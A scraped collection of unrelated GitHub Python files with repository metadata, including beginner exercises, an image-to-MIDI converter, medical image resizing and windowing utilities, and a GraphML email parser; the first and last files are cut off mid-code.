{data.prefix}{method.prefix}{params.prefix} is encoded')\n\n# for params in paramSets:\n# for data in datasets:\n# for method in quantizers:\n# print (f'Settings: {data.prefix}{method.prefix}{params.prefix}')\n# print (f'Quantization error: {method.getQuantizationError(data, params)}')\n\n# for params in paramSets:\n# for data in datasets:\n# for method in quantizers:\n# neighborsCount = min(1024, data.basePointsCount)\n# result = method.searchNearestNeighbors(data, params, k=neighborsCount)\n\n# groundtruth = ivecs_read(data.groundtruthFilename)\n# print (f'Results: {data.prefix}{method.prefix}{params.prefix}')\n# T = [2**i for i in range(11)]\n# T.insert(5, 20)\n# for i in T:\n# print (f'Recall@{i} {getRecallAt(i, result, groundtruth)}')","repo_name":"z2liudake/Online-AQ","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2052,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"23651987679","text":"#Nombre: Jose Manuel Buendia Rodriguez\r\n#No. Control: 19011231\r\n#Calificacion\r\n\r\nlista = [5,7,3,1,8,4,9,2,6]\r\n\r\nlongitud = len(lista)\r\n\r\nfor i in range(longitud-1):\r\n print(lista)\r\n menor = i \r\n print(\"El indice actual para comprar es: \",menor)\r\n for j in range (i+1, longitud):\r\n if lista[j] < lista[menor]:\r\n menor = j\r\n print(\"Recorriendo lista, Es menor el indice \", menor )\r\n\r\n temporal = lista[menor]\r\n lista[menor] = lista[i]\r\n lista[i] = temporal\r\n print(\"Cambiamos el elemento \", lista[menor], \"por el elemento\", lista[i])","repo_name":"miguelinux/O2022-ayda","sub_path":"1025/seleccion/OrdenamientoSeleccion.py","file_name":"OrdenamientoSeleccion.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"es","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"24232497795","text":"'''\n思路:\n 首先分隔字符串\n 再将每个单词进行反转\n 反转可以使用reverse 或者切片\n'''\ndef reverseWords(s):\n l=s.split()\n for i in range(len(l)):\n s=l[i]\n l[i]=s[::-1]\n return ' '.join(l)\n\ns=\"Let's take LeetCode contest\"\nprint(reverseWords(s))","repo_name":"liucheng2912/py","sub_path":"leecode/easy/219/557.py","file_name":"557.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30135745828","text":"from .hilbert_curve import *\nfrom midiutil.MidiFile import MIDIFile\nfrom PIL import Image\nfrom .median_color_quantifier import *\nfrom django.core.files.temp import NamedTemporaryFile\nfrom wsgiref.util import FileWrapper\nfrom tempfile import TemporaryFile\nfrom django.http import FileResponse\n\n\n# Testing stuff with specific colors to specific notes\ntest_palette = [(174,0,0),(255,0,0),(255,0,0),(255,102,0),(255,239,0),\n (153,255,0),(40,255,0),(0,255,242),(0,122,255),(5,0,255),\n (71,0,237),(99,0,178) ]\nrespective_notes = [66,67,68,69,70,71,72,73,74,75,76,77]\n\ndef lengthen_scale_octave(scale):\n returnScale = scale\n for i in range(len(scale)):\n returnScale.append(scale[i] + 8)\n return returnScale\n\ndef image_to_audio(imageBinary, input_scale,palette_size):\n \"\"\"\n Outputs a MIDI file that is a piano interpretation of an image\n\n :param imageBinary: Binary image data\\n\n :param input_scale: Desired musical scale (in the form of list of MIDI note values)\\n\n :param palette_size: Number of unique colors the image will be compressed to (must be power of 2)\\n\n :return: MIDI binary file\n \"\"\"\n #double_amount = int(math.log(palette_size,2)-3)\n scale = input_scale\n #for i in range(double_amount):\n #scale = lengthen_scale_octave(scale);\n # Open the image data\n im = Image.open(imageBinary)\n pix = im.load()\n color_palette = color_quantify(palette_size,im) # Simplify the image's number of colors to the palette size\n color_palette.sort(key=lambda tup: (tup[0]+tup[1]+tup[2])) # Sort the colors from darkest to brightest (will map the darker colors to lower scale notes)\n m = im.size[0]\n mf = MIDIFile(1)\n \n track = 0\n time = 0\n channel = 0\n volume = 100\n time = 0\n duration = 1\n \n mf.addTrackName(track,time,'ImageSong')\n mf.addTempo(track,time,120)\n \n \n numOfSkipPixels = 1\n i = 0\n while i < m**2:\n numOfSkipPixels = 1\n duration = 0.5\n timeIncrement = 0.5\n coordinate = d2xy(m,i)\n rgbVal = pix[coordinate[0],coordinate[1]]\n note = color_palette.index(closest_color(color_palette,rgbVal)) \n \n #note = test_palette.index(closest_color(test_palette,rgbVal)) #This is testing with specific colors to notes\n for j in range(i+1,m**2):\n coordinate2 = d2xy(m,j)\n rgbVal2 = pix[coordinate2[0],coordinate2[1]]\n \n note2 = color_palette.index(closest_color(color_palette,rgbVal2)) \n \n #note2 = test_palette.index(closest_color(test_palette,rgbVal2)) #This is testing with specific colors to notes\n \n if (note2 == note):\n duration += 0.5\n timeIncrement += 0.5\n numOfSkipPixels += 1\n else:\n break\n \n mf.addNote(track, channel, scale[note], time, duration, volume)\n time += timeIncrement\n\n i += numOfSkipPixels\n\n return mf\n\n # write it to disk\n #mf.writeFile(temp)\n #with open(\"C:\\\\Users\\\\Kenny\\\\Desktop\\\\aye.mid\", 'wb') as outf:\n #mf.writeFile(outf)\n\n","repo_name":"kmdiogo/SynOpticWebsite","sub_path":"SynOptic_Website/AudioizationScripts/image_to_sound.py","file_name":"image_to_sound.py","file_ext":"py","file_size_in_byte":3183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23232595264","text":"\ncount = 0\nbest_score = 0\nbest_movie = \"\"\n\nwhile True:\n movie_name = input()\n count += 1\n ascii = 0\n if movie_name == \"STOP\":\n break\n if count == 7:\n print(\"The limit is reached.\")\n break\n for i in movie_name:\n if ord(i) in range(ord(\"A\"), ord(\"Z\") + 1):\n ascii += ord(i) - len(movie_name)\n elif ord(i) in range(ord(\"a\"), ord(\"z\") + 1):\n ascii += ord(i) - ( 2 *len(movie_name))\n else:\n ascii += ord(i)\n if ascii > best_score:\n best_score = ascii\n best_movie = movie_name\nprint(F\"The best movie for you is {best_movie} with {best_score} ASCII sum.\")\n\n\n","repo_name":"Nedelchev86/Python-Basic-SoftUni","sub_path":"Online_Exam_15_and_16_June_2019/06_Favorite_Movie.py","file_name":"06_Favorite_Movie.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29644164430","text":"import numpy as np \nimport cv2\nfrom skimage.exposure import rescale_intensity as rescale_int\nimport matplotlib.cm as cm\nimport SimpleITK as sitk\n\n\"\"\"Different image utils.\"\"\"\n\n__author__ = 'Ken C. L. Wong'\n\n\ndef get_pad_crop_bound(size):\n \"\"\"Gets the padding or cropping bounds using the max of the input (padding) or output (cropping) size.\"\"\"\n max_size = np.max(size)\n lb = []\n ub = []\n for sz in size:\n diff = int(max_size - sz)\n lb.append(diff / 2)\n ub.append(diff - diff/2)\n return lb, ub\n\n\ndef pad_resize(image, output_size, hw_only=False, interpolator=sitk.sitkNearestNeighbor, make_copy=True):\n \"\"\"Resizes an image and pads it to a square or cubic image if required.\n\n :param image: numpy array (hw, dhw, hwc, or dhwc) or SimpleITK Image (xy or xyz).\n :param output_size: output size, (height, width) or (depth, height, width).\n :param hw_only: if True, only zero-pad the height and width. 3D image only.\n :param interpolator: SimpleITK interpolator. E.g. sitk.sitkNearestNeighbor, sitk.sitkLinear.\n :param make_copy: if True, a copy of the image is returned if there is no modification.\n :return: Resized image.\n \"\"\"\n if len(output_size) == 2:\n hw_only = False\n\n original_image = image\n\n # Remember image type for numpy array\n image_type = None\n if not isinstance(image, sitk.Image):\n image_type = image.dtype\n\n # Get input size in xy or xyz\n if isinstance(image, sitk.Image):\n input_size = image.GetSize()\n else:\n input_size = image.shape[::-1]\n if image.ndim == len(output_size) + 1:\n input_size = input_size[1:]\n\n # Get output size in xy or xyz\n output_size = output_size[::-1]\n\n # Pad square or cube if necessary\n # Same size for all directions (2D, 3D)\n if np.unique(output_size).size == 1 and np.unique(input_size).size != 1 and not hw_only:\n lb, ub = get_pad_crop_bound(input_size)\n image = pad_or_crop(sitk.ConstantPad, image, lb, ub)\n # Same size for height and width only (3D)\n elif np.unique(output_size[:2]).size == 1 and np.unique(input_size[:2]).size != 1:\n lb, ub = get_pad_crop_bound(input_size[:2])\n image = pad_or_crop(sitk.ConstantPad, image, lb + [0], ub + [0])\n\n # Resize\n if not all(input_size[i] == output_size[i] for i in range(len(output_size))):\n image = resize(image=image, output_size=output_size[::-1], interpolator=interpolator)\n\n # Restore type\n if image_type is not None:\n image = get_array(image)\n image = np.asarray(image, dtype=image_type)\n\n # Make a copy if no change\n if original_image is image and make_copy:\n if isinstance(image, sitk.Image):\n image = sitk.Cast(image, image.GetPixelID())\n else:\n image = image.copy()\n\n return image\n\n\ndef pad_or_crop(ops, image, lb, ub):\n \"\"\"Pads or crops an image.\n\n :param ops: operation, sitk.ConstantPad or sitk.Crop.\n :param image: input image. Can be numpy array or SimpleITK Image.\n :param lb: padding lower bound.\n :param ub: padding upper bound.\n :return: padded image (SimpleITK Image).\n \"\"\"\n # Single-channel\n if (isinstance(image, sitk.Image) and image.GetNumberOfComponentsPerPixel() == 1) or image.ndim == len(lb):\n image = get_sitk_image(image)\n image = ops(image, lb, ub)\n # Multi-channel\n else:\n image = get_array(image)\n image = np.moveaxis(image, -1, 0)\n image_channels = [ops(get_sitk_image(img), lb, ub) for img in image]\n image = sitk.Compose(image_channels)\n\n return image\n\n\ndef reverse_pad_resize(image, output_size, hw_only=False, interpolator=sitk.sitkNearestNeighbor):\n \"\"\"Reverses the process of pad_resize and returns the original sized image. This function is useful for resizing\n the CNN output mask to fit the original image.\n\n :param image: numpy array (hw, dhw, hwc or dhwc) or SimpleITK Image (xy or xyz).\n :param output_size: output size, (height, width) or (depth, height, width), usually the shape of the original\n image before pad_resize.\n :param hw_only: if True, only crop the height and width. Needs to be consistent with pad_resize.\n :param interpolator: SimpleITK interpolator. E.g. sitk.sitkNearestNeighbor, sitk.sitkLinear.\n :return the resized image with output_size.\n \"\"\"\n if len(output_size) == 2:\n hw_only = False\n\n original_image = image\n\n # Remember image type for numpy array\n image_type = None\n if not isinstance(image, sitk.Image):\n image_type = image.dtype\n\n # Get input size in xy or xyz\n if isinstance(image, sitk.Image):\n input_size = image.GetSize()\n else:\n input_size = image.shape[::-1]\n if image.ndim == len(output_size) + 1:\n input_size = input_size[1:]\n\n # Get output size in xy or xyz\n output_size = output_size[::-1]\n\n # Resize and crop\n # Same size for all directions (2D, 3D)\n if np.unique(input_size).size == 1 and np.unique(output_size).size != 1 and not hw_only:\n size = np.ones(len(output_size)) * np.max(output_size)\n image = resize(image=image, output_size=size, interpolator=interpolator)\n lb, ub = get_pad_crop_bound(output_size)\n image = pad_or_crop(sitk.Crop, image, lb, ub)\n # Same size for height and width only (3D)\n elif np.unique(input_size[:2]).size == 1 and np.unique(output_size[:2]).size != 1:\n xy = output_size[:2]\n size = [output_size[2]] + list(np.ones(len(xy)) * np.max(xy)) # dhw\n image = resize(image=image, output_size=size, interpolator=interpolator)\n lb, ub = get_pad_crop_bound(xy)\n image = pad_or_crop(sitk.Crop, image, lb + [0], ub + [0])\n # Resize only\n else:\n image = resize(image=image, output_size=output_size[::-1], interpolator=interpolator)\n\n # Restore type\n if image_type is not None:\n image = get_array(image)\n image = np.asarray(image, dtype=image_type)\n\n # Make a copy if no change\n if original_image is image:\n if isinstance(image, sitk.Image):\n image = sitk.Cast(image, image.GetPixelID())\n else:\n image = image.copy()\n\n return image\n\n\ndef resize_by_spacing(image, input_spacing=None, interpolator=sitk.sitkNearestNeighbor):\n \"\"\"Resizes an image to isotropic spacing.\n\n The smallest spacing is used. This is useful as the image may be abnormally deformed when spacing information is\n discarded.\n\n :param image: numpy array (hw or dhw) or SimpleITK Image (xy or xyz).\n :param input_spacing: input image spacing, (height, width) or (depth, height, width).\n :param interpolator: SimpleITK interpolator. E.g. sitk.sitkNearestNeighbor, sitk.sitkLinear.\n :return: Resized image.\n \"\"\"\n if input_spacing is None:\n if isinstance(image, sitk.Image):\n input_spacing = image.GetSpacing()\n else:\n raise Exception('Input spacing must be provided for non-SimpleITK images.')\n\n # The smallest spacing is used\n output_spacing = np.ones(len(input_spacing)) * np.min(input_spacing)\n\n return resize(image=image, output_spacing=output_spacing, interpolator=interpolator)\n\n\ndef resize(image, output_size=None, output_spacing=None, interpolator=sitk.sitkNearestNeighbor):\n \"\"\"Resizes an image by the given output size and/or output spacing.\n\n :param image: numpy array (hw or dhw) or SimpleITK Image (xy or xyz).\n :param output_size: output size, (height, width) or (depth, height, width).\n :param output_spacing: output spacing, (height, width) or (depth, height, width).\n :param interpolator: SimpleITK interpolator. E.g. sitk.sitkNearestNeighbor, sitk.sitkLinear.\n :return: Resized image.\n \"\"\"\n if output_size is None and output_spacing is None:\n raise Exception('Both output_size and output_spacing are None.')\n\n image_type = None\n if not isinstance(image, sitk.Image):\n\n # Check if vector image\n if output_size is not None:\n target_dim = len(output_size)\n else:\n target_dim = len(output_spacing)\n isVector = False\n if image.ndim == target_dim + 1:\n isVector = True\n\n image_type = image.dtype # Remember the original type which may be changed during operations\n image = get_sitk_image(image, isVector=isVector)\n\n input_spacing = np.asarray(image.GetSpacing())\n input_size = np.asarray(image.GetSize())\n physical_size = input_spacing * input_size\n\n # Change to SimpleITK format, xy or xyz\n if output_size is not None:\n output_size = np.asarray(output_size)[::-1]\n if output_spacing is not None:\n output_spacing = np.asarray(output_spacing)[::-1]\n\n # Compute missing arguments assuming same physical size\n if output_spacing is None:\n output_spacing = physical_size / output_size\n elif output_size is None:\n output_size = physical_size / output_spacing\n\n resample = sitk.ResampleImageFilter()\n resample.SetInterpolator(interpolator)\n resample.SetSize(np.asarray(output_size, np.int))\n resample.SetOutputSpacing(output_spacing)\n resample.SetOutputOrigin(image.GetOrigin())\n image = resample.Execute(image)\n\n if image_type is not None:\n image = get_array(image)\n image = np.asarray(image, dtype=image_type)\n\n return image\n\n\ndef get_sitk_image(image, isVector=False):\n \"\"\"Converts to a SimpleITK Image if necessary.\n\n :param image: numpy array (hw or dhw) or SimpleITK Image (xy or xyz).\n :return: SimpleITK Image.\n \"\"\"\n if not isinstance(image, sitk.Image):\n image = sitk.GetImageFromArray(image, isVector=isVector) # Transpose is taken care by SimpleITK\n return image\n\n\ndef get_array(image):\n \"\"\"Converts to a numpy array if necessary.\n\n :param image: numpy array (hw or dhw) or SimpleITK Image (xy or xyz).\n :return: numpy array.\n \"\"\"\n if isinstance(image, sitk.Image):\n image = sitk.GetArrayFromImage(image) # Transpose is taken care by SimpleITK\n return image\n\n\ndef modify_size_channel(image, output_size, channels, interpolator=sitk.sitkNearestNeighbor):\n \"\"\"Modifies image size and channel.\n\n :param image: numpy array, channels_last, hwc or dhwc.\n :param output_size: output size, (height, width) or (depth, height, width).\n :param channels: output channels (1 or 3).\n :param interpolator: SimpleITK interpolator. E.g. sitk.sitkNearestNeighbor, sitk.sitkLinear.\n :return: modified image.\n \"\"\"\n\n if image.ndim not in [3, 4]:\n raise Exception('Input image must be 2D or 3D with channels.')\n\n # Resize all channels\n input_channels = image.shape[-1]\n output_image = []\n for i in range(input_channels):\n output_image.append(resize(image=image[..., i], output_size=output_size, interpolator=interpolator))\n image = np.array(output_image) # channels_first\n\n # Modify channels if needed\n if channels == 1 and input_channels == 3:\n image = image.mean(axis=0, keepdims=True)\n elif channels == 3 and input_channels == 1:\n image = image.repeat(channels, axis=0)\n\n # Change to channels_last\n axes = range(image.ndim)\n axes = axes[1:] + axes[:1]\n image = image.transpose(axes)\n\n return image\n\n\ndef modify_size_channel_batch(image, output_size, channels, interpolator=sitk.sitkNearestNeighbor):\n \"\"\"Modifies image size and channels of an image batch.\n\n :param image: numpy array, channels_last, bhwc or bdhwc.\n :param output_size: output size, (height, width) or (depth, height, width).\n :param channels: output channels (1 or 3).\n :param interpolator: SimpleITK interpolator. E.g. sitk.sitkNearestNeighbor, sitk.sitkLinear.\n :return: modified image batch.\n \"\"\"\n assert image.ndim in [4, 5]\n output_image = []\n for img in image:\n output_image.append(\n modify_size_channel(image=img, output_size=output_size, channels=channels, interpolator=interpolator))\n image = np.array(output_image)\n\n return image\n\n\ndef bound_by_labels(labels, scale=1.0, pad_square=True):\n \"\"\"\n Gets a bounding box from a label image.\n\n :param labels: grey-level label image.\n :param scale: isotropic scaling of the bounding box.\n :param pad_square: True if padding the shorter side of the bounding box.\n\n :return: the bounding box with shape (2, 2). The first index is for the dimension (h, w), and the second index is\n for the lower and upper bounds (lb, ub). Cropping with the bounding box can be performed as: cropped = image[\n bound[0][0]:bound[0][1], bound[1][0]:bound[1][1]]\n \"\"\"\n\n # Get bounding box\n _, contours, _ = cv2.findContours(labels.astype(np.uint8), mode=cv2.RETR_LIST, method=cv2.CHAIN_APPROX_SIMPLE)\n points = np.concatenate(contours)\n bound = cv2.boundingRect(points) # [x, y, w, h]\n\n # Convert format\n sz = np.array([bound[3], bound[2]])\n bound = np.array([[bound[1], bound[1]+bound[3]],\n [bound[0], bound[0]+bound[2]]])\n\n # Rescale\n if scale != 1.0:\n for i in range(2):\n diff = (scale-1) * 0.5 * sz[i]\n bound[i][0] -= diff # lower bound\n bound[i][1] += diff # upper bound\n bound = bound.astype(np.int)\n\n # Pad square\n sz = bound[:, 1] - bound[:, 0]\n if pad_square and sz[0] != sz[1]:\n diff = sz.max() - sz.min()\n idx = sz.argmin()\n bound[idx][0] -= diff/2\n bound[idx][1] += diff/2 + diff % 2\n\n # Correct index\n for i in range(2):\n bound[i][0] = bound[i][0] if bound[i][0] >= 0 else 0\n bound[i][1] = bound[i][1] if bound[i][1] <= labels.shape[i] else labels.shape[i]\n\n return bound\n\n\ndef windowing(image, window_center, window_width):\n \"\"\"Performs windowing on an image.\n\n :param numpy.array image: grey-level image.\n :param int/list/array window_center: for a scalar, it is used as the window center. For a list or array,\n its length must be a multiple of two to represent pairs of possible ranges. A random number generated between a\n pair is used as the window center. The pair used is the same as that of window_width if it is also a list or array.\n :param int/list/array window_width: for a scalar, it is used as the window width. For a list or array,\n its length must be a multiple of two to represent pairs of possible ranges. A random number generated between a\n pair is used as the window width. The pair used is the same as that of window_center if it is also a list or array.\n :return windowed image\n\n window_center and window_width must have the same length if both are not scalar.\n \"\"\"\n\n idx = None # Index to both window_center and window_width\n\n if np.isscalar(window_center):\n center = window_center\n else:\n if len(window_center) % 2 != 0:\n raise Exception('window_center must be a scalar or a list with even number of elements.')\n if idx is None:\n idx = np.random.choice(len(window_center)/2) * 2\n center = np.random.uniform(window_center[idx], window_center[idx+1])\n\n if np.isscalar(window_width):\n width = window_width\n else:\n if len(window_width) % 2 != 0:\n raise Exception('window_width must be a scalar or a list with even number of elements.')\n if idx is None:\n idx = np.random.choice(len(window_width)/2) * 2\n width = np.random.uniform(window_width[idx], window_width[idx+1])\n\n input_min = center - 0.5*width\n input_max = center + 0.5*width\n return rescale_int(image, in_range=(input_min, input_max), out_range=(0, 255))\n\n\nclass IntensityRescaleType(object):\n \"\"\"Defining the enum for image intensity rescaling.\"\"\"\n WINDOW = 0\n CLAHE = 1\n\n\ndef rescale_intensity(image, rescale_types, window_center=None, window_width=None):\n \"\"\" Based on the given rescale_list, performs image intensity rescaling such as windosing and histogram equalization.\n\n :param image: numpy array (hw or hwd).\n :param rescale_types: a list of IntensityRescaleEnum indicating which methods can be performed.\n :param int/list/array window_center: for a scalar, it is used as the window center. For a list or array,\n its length must be a multiple of two to represent pairs of possible ranges. A random number generated between a\n pair is used as the window center. The pair used is the same as that of window_width if it is also a list or array.\n :param int/list/array window_width: for a scalar, it is used as the window width. For a list or array,\n its length must be a multiple of two to represent pairs of possible ranges. A random number generated between a\n pair is used as the window width. The pair used is the same as that of window_center if it is also a list or array.\n :return: intensity-rescaled image (0-255).\n \"\"\"\n\n if not rescale_types:\n raise ValueError('rescale_types is empty')\n\n idx = np.random.choice(len(rescale_types))\n if rescale_types[idx] == IntensityRescaleType.WINDOW:\n if window_center is None or window_width is None:\n return cv2.normalize(image, dst=np.array([]), alpha=0, beta=255, norm_type=cv2.NORM_MINMAX,\n dtype=cv2.CV_8UC1)\n else:\n return windowing(image, window_center, window_width)\n elif rescale_types[idx] == IntensityRescaleType.CLAHE:\n return clahe(image, clip_limit=3.0)\n else:\n raise Exception('Unexpected type.')\n\n\ndef clahe(image, clip_limit=3.0, tile_size=None):\n \"\"\"CLAHE for 2D and 3D images. Slice-by-slice for 3D images.\n\n :param image: numpy array (hw or dhw).\n :param clip_limit: clip limit for CLAHE.\n :param tile_size: tile size for CLAHE.\n :return: image after CLAHE.\n \"\"\"\n\n # Rescale to 0-255\n image = cv2.normalize(image, dst=np.array([]), alpha=0, beta=255, norm_type=cv2.NORM_MINMAX, dtype=cv2.CV_8UC1)\n\n # Perform CLAHE\n equalizer = cv2.createCLAHE(clipLimit=clip_limit, tileGridSize=tile_size)\n if image.ndim == 2: # hw\n image = equalizer.apply(image)\n elif image.ndim == 3: # dhw\n output_image = []\n for img in image: # Slice-by-slice\n output_image.append(equalizer.apply(img))\n image = np.array(output_image)\n else:\n raise Exception('Only support 2D and 3D images.')\n\n return image\n\n\ndef colormap_31():\n \"\"\"Gets a colormap that has 31 independent colors from label 1 to 31.\"\"\"\n cmap = np.concatenate([cm.tab20b_r(range(20)), cm.Set3_r(range(11))])\n return matplotlib_to_opencv_colormap(cmap)\n\n\ndef matplotlib_to_opencv_colormap(cmap, black_bg=True, unique_color=True):\n cmap = cmap * 255\n cmap = cmap[:, :3].astype(np.uint8)\n if unique_color:\n _, idx = np.unique(cmap, axis=0, return_index=True)\n cmap = cmap[np.sort(idx)]\n if black_bg:\n cmap = np.concatenate(([[0, 0, 0]], cmap))\n if len(cmap) < 256:\n cmap = np.concatenate((cmap, np.ones((256 - len(cmap), 3)) * 255))\n cmap = np.fliplr(cmap)\n cmap = np.array([cmap])\n return cmap\n\n\ndef map_label(label, cmap=colormap_31()):\n \"\"\"Maps label to a given colormap.\n\n :param label: label.\n :param cmap: numpy.array cmap: colormap for mapping the label.\n :return: label with mapped color.\n \"\"\"\n\n label = cv2.cvtColor(label.astype(np.uint8), cv2.COLOR_GRAY2RGB)\n return cv2.LUT(label, cmap).astype(np.uint8)\n\n\ndef label_overlay(image, label, image_alpha=0.5, label_alpha=0.5, cmap=colormap_31()):\n \"\"\"Overlays label on image.\n\n :param numpy.array image: image.\n :param numpy.array label: label.\n :param float image_alpha: controls transparency of image.\n :param float label_alpha: controls transparency of label.\n :param numpy.array cmap: colormap for mapping the label.\n :return: image overlapped with label.\n :return: label with mapped color.\n \"\"\"\n\n image = cv2.normalize(image, dst=np.array([]), alpha=0, beta=255, norm_type=cv2.NORM_MINMAX, dtype=cv2.CV_8UC1)\n image = cv2.cvtColor(image, cv2.COLOR_GRAY2RGB)\n label_new = map_label(label, cmap)\n\n return cv2.addWeighted(image, image_alpha, label_new, label_alpha, 0), label_new\n\n\ndef slice_padding(image, num_slices, padding='zero'):\n \"\"\"Slice padding for multi-instance learning.\n\n :param numpy.array image: input image.\n :param int num_slices: number of target slices.\n :param str padding: padding method. 'zero', 'repeat', or 'linear'.\n :return: padded image.\n :rtype: numpy.array\n \"\"\"\n\n padding_allowed = {'zero', 'repeat', 'linear'}\n if padding not in padding_allowed:\n raise ValueError('The `padding` argument must be one of \"zero\", \"repeat\". Received: ' + str(padding))\n\n num_slices = int(num_slices) # Ensure integer\n image_padded = image\n\n len_image = len(image)\n\n if padding == 'repeat':\n\n mid_slice = int(len_image * 0.5)\n\n # Padding. Padding slices are from the middle part of the image. Looping is used as the extra slices required\n # can be larger than the entire image, though this should seldom happen.\n while num_slices != len(image_padded):\n extra_slices = num_slices - len(image_padded)\n\n start_idx = mid_slice - extra_slices/2\n start_idx = 0 if start_idx < 0 else start_idx\n\n end_idx = mid_slice + extra_slices/2 + extra_slices % 2\n end_idx = len_image if end_idx > len_image else end_idx\n\n pad = image[range(start_idx, end_idx)]\n image_padded = np.concatenate([image_padded, pad])\n\n elif padding == 'zero':\n\n pad = np.zeros((num_slices - len_image,) + image_padded.shape[1:], dtype=image_padded.dtype)\n image_padded = np.concatenate([image_padded, pad])\n\n elif padding == 'linear':\n\n image_shape = image_padded.shape\n axis = np.argmin(image_shape) # Channel axis\n assert image_shape[axis] == 1, 'Slice interpolation only works for gray-level images.'\n\n # Remove channel --> z, y, x.\n image_padded = image_padded[:, 0, ...] if axis == 1 else image_padded[..., 0]\n\n # Interpolation using SimpleITK\n image_sitk = sitk.GetImageFromArray(image_padded) # Transpose is taken care by SimpleITK\n spacing = np.asarray(image_sitk.GetSpacing())\n spacing[2] *= len_image / float(num_slices)\n size = np.asarray(image_sitk.GetSize())\n size[2] = num_slices\n resample = sitk.ResampleImageFilter()\n resample.SetSize(size)\n resample.SetOutputSpacing(spacing)\n resample.SetOutputOrigin(image_sitk.GetOrigin())\n image_sitk = resample.Execute(image_sitk)\n\n # Restore format\n image_padded = sitk.GetArrayFromImage(image_sitk) # Transpose is taken care by SimpleITK\n image_padded = np.expand_dims(image_padded, axis=axis)\n\n return image_padded\n","repo_name":"CS527Applied-Machine-Learning-for-Games/Team-Scrubs","sub_path":"PythonFiles/ML code/scripts/utils/imageutils.py","file_name":"imageutils.py","file_ext":"py","file_size_in_byte":22845,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"35393001085","text":"import re\nimport SETTINGS\n\nfrom Message import Message\nfrom EmailAddress import EmailAddress\nfrom Person import Person\nfrom Edge import Edge\n\ndef extract_data(tree):\n GRAPH = \"{http://graphml.graphdrawing.org/xmlns}graph\"\n NODE = \"{http://graphml.graphdrawing.org/xmlns}node\"\n EDGE = \"{http://graphml.graphdrawing.org/xmlns}edge\"\n DATA = \"{http://graphml.graphdrawing.org/xmlns}data\"\n\n email_address_nodes = {}\n message_nodes = {}\n person_nodes = {}\n edges = {}\n \n # 'graphml' level\n root = tree.getroot()\n\n # 'graph' level\n for element in root:\n if element.tag == GRAPH:\n \n # 'node' and 'edge' level\n for node in element:\n if node.tag == NODE:\n node_id = node.get('id')\n epoch_secs = body = email_id = subject = datetime = None\n for data in node.findall(DATA):\n\n # Email Address related fields\n if data.get('key') == 'address':\n address = data.text\n elif data.get('key') == 'fullyObserved':\n fully_observed = data.text\n \n # Message related fields\n elif data.get('key') == 'datetime':\n datetime = data.text \n elif data.get('key') == 'epochSecs':\n epoch_secs = data.text\n elif data.get('key') == 'subject':\n# subject = clean_data(data.text)\n subject = data.text \n elif data.get('key') == 'body':\n# body = clean_data(data.text)\n body = data.text\n elif data.get('key') == 'emailID':\n email_id = data.text\n \n # Person related fields\n elif data.get('key') == 'lastName':\n lastname = data.text\n elif data.get('key') == 'firstName':\n firstname = data.text\n elif data.get('key') == 'provenance':\n provenance = data.text\n \n # Checking the message type\n for data in node.findall(DATA):\n if data.get('key') == 'type' and data.text == 'Email Address':\n email_new_node = EmailAddress(node_id, address, fully_observed)\n\n # Saving into dictionary with node_id as key\n email_address_nodes[email_new_node._node_id] = email_new_node\n elif data.get('key') == 'type' and data.text == 'Message':\n message_new_node = Message(node_id, datetime, epoch_secs, subject, body, email_id)\n\n # Saving into dictionary with node_id as key\n message_nodes[message_new_node._node_id] = message_new_node\n elif data.get('key') == 'type' and data.text == 'Person':\n person_new_node = Person(node_id, lastname, firstname, provenance)\n\n # Saving into dictionary with node_id as key\n person_nodes[person_new_node._node_id] = person_new_node \n\n elif node.tag == EDGE:\n edge_id = node.get('id')\n edge_source = node.get('source')\n edge_target = node.get('target')\n edge_label = node.get('label')\n \n epoch_secs = order = datetime = edge_type = start_datetime = end_datetime = evidence_type = None\n for data in node.findall(DATA):\n if data.get('key') == 'epochSecs':\n epoch_secs = data.text\n elif data.get('key') == 'order':\n order = data.text\n elif data.get('key') == 'datetime':\n datetime = data.text\n elif data.get('key') == 'type':\n edge_type = data.text\n elif data.get('key') == 'startDatetime':\n start_datetime = data.text\n elif data.get('key') == 'endDatetime':\n end_datetime = data.text\n elif data.get('key') == 'evidenceType':\n evidence_type = data.text \n \n \n new_edge = Edge(edge_id, edge_source, edge_target, edge_label, epoch_secs, order, datetime, edge_type, start_datetime, end_datetime, evidence_type)\n edges[new_edge._edge_id] = new_edge\n \n return message_nodes, email_address_nodes, person_nodes, edges\n\n\ndef clean_data(text):\n # Removing special characters\n text = re.sub(\"[\\n\\t\\-\\*\\+\\$\\\"\\\\\\(\\)\\_\\=]+\", \" \", text)\n \n # Removing tags\n text = re.sub('(<[^<]+>|<<[^<<]+>>)', \"\", text)\n text = re.sub(\"<<\", \" \", text)\n text = re.sub(\">>\", \" \", text)\n text = re.sub(\"(<|>|#)\", \" \", text)\n \n # Removing time\n text = re.sub('([\\d]+:\\d\\d) (AM|PM)', \"\", text)\n # Removing date\n text = re.sub('([\\d]+/[\\d]+/[\\d]+)', \"\", text)\n text = re.sub('([\\d]+\\.[\\d]+\\.[\\d]+)', \"\", text)\n text = re.sub('(Monday|Tuesday|Wednesday|Thursday|Friday|Saturday|Sunday){0,1},? (January|February|March|April|May|June|July|August|September|October|November|December){0,} [\\d]*,? ?[\\d]*', \" \", text)\n # Removing labels\n text = re.sub('(From:|To:|Sent:|Cc:|cc:|Bcc:|RE:|Re:|FWD:|Subject:|Original Message)', \"\", text)\n # Removing urls\n text = re.sub('https?:\\/\\/.*? ', '', text)\n # Removing punctuations\n text = re.sub('[;\\,\\?\\.\\:\\!]', \" \", text)\n # Removing numbers\n text = re.sub('(0|1|2|3|4|5|6|7|8|9){1,}', \"\", text)\n # Removing email address\n \n # Removing rest\n text = re.sub('[/@]', \" \", text)\n text = re.sub(\"'s\", \"\", text)\n text = re.sub(\"\\'\", \"\", text)\n text = 